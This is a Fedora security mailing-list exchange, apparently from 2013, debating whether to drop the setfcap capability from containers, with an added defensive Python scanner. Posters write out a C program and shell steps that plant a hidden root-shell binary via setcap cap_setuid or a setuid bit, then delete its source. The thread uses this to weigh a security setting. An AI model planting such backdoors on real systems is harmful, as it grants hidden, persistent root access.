On 09/27/2013 03:33 PM, "Jóhann B. Guðmundsson" wrote:
On 09/27/2013 05:28 PM, Matthew Miller wrote:
>
> We're considering removing setfcap from the list of dropped capabilities.
> It seems safe to me
I don't have any security degrees, nor do I consider myself an evil man, and probably Steve and Dan would be better suited to answer this question since I'm far from being any expert on the subject, but hypothetically would someone not be able to do something like this in the educational sample I'm providing:
cd ~user
vi bd.c

#include <unistd.h>
#include <fcntl.h>

int main(void)
{
    char *name[2];
    /* Succeeds only while the process holds CAP_SETUID (here via the file
       capability granted below); otherwise it fails and the shell stays "user". */
    setuid(0);
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}

gcc bd.c -o .b
chown user:user .b
chmod 750 .b
setcap cap_setuid=ep .b
rm bd.c
./.b
if you did?
I personally would recommend we kept it on; after all, Dan did push for that feature for a reason, but as I said I'm no expert on the topic.
JBG
--
security mailing list
security(a)lists.fedoraproject.org
https://admin.fedoraproject.org/mailman/listinfo/security

Well, currently without setfcap you can do the same thing with
gcc bd.c -o .b
chown user:user .b
chmod 4750 .b
rm bd.c
./.b
Meaning that eliminating setfcap gives the container no additional security,
just breaks things.
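As an added example that is not part of this thread: a defender-side Python check for the two equivalent routes the replies compare, a setuid bit (chmod 4750) and a security.capability xattr granting cap_setuid (setcap), decoding the kernel's on-disk vfs_cap_data layout directly so the result does not depend on getcap being installed in the image. The constants are the kernel's; the function names and the scan() walk over an unpacked container root are my own.

```python
import os
import stat
import struct
CAP_SETUID, CAP_SETFCAP = 7, 31        # bit numbers from <linux/capability.h>
CAP_NAMES = {CAP_SETUID: "cap_setuid", CAP_SETFCAP: "cap_setfcap"}
VFS_CAP_FLAGS_EFFECTIVE = 0x000001     # the "e" in "cap_setuid=ep"
VFS_CAP_REVISION_MASK = 0xFF000000     # struct vfs_cap_data revision 2 or 3

def decode_vfs_cap(raw):
    """Decode a security.capability xattr (struct vfs_cap_data, little-endian):
    magic_etc, then (permitted, inheritable) for caps 0-31 and for caps 32-63
    (revision 3 appends a rootid, unused here). Returns (effective, perm, inh)."""
    magic_etc = struct.unpack_from("<I", raw, 0)[0]
    if magic_etc & VFS_CAP_REVISION_MASK not in (0x02000000, 0x03000000):
        raise ValueError("unsupported vfs_cap_data revision")
    perm_lo, inh_lo, perm_hi, inh_hi = struct.unpack_from("<IIII", raw, 4)
    return (bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
            perm_lo | perm_hi << 32, inh_lo | inh_hi << 32)

def cap_names(mask):
    return sorted(CAP_NAMES.get(i, "cap_%d" % i) for i in range(64) if mask >> i & 1)

def classify(mode, uid, raw_cap):
    """Name the routes from the thread that a file's metadata opens: a setuid
    binary (chmod 4750) or a file capability carrying cap_setuid (setcap)."""
    findings = []
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        findings.append("setuid(uid=%d)" % uid)
    if raw_cap is not None:
        effective, permitted, _ = decode_vfs_cap(raw_cap)
        if permitted >> CAP_SETUID & 1:
            findings.append("filecap:%s=%sp" % ("+".join(cap_names(permitted)), "e" if effective else ""))
    return findings

def scan(root):
    """Walk a tree (e.g. an unpacked container rootfs) and collect offending files."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            try:   # Linux only; a missing xattr raises OSError (ENODATA)
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:
                raw = None
            found = classify(st.st_mode, st.st_uid, raw)
            if found:
                hits[path] = found
    return hits
```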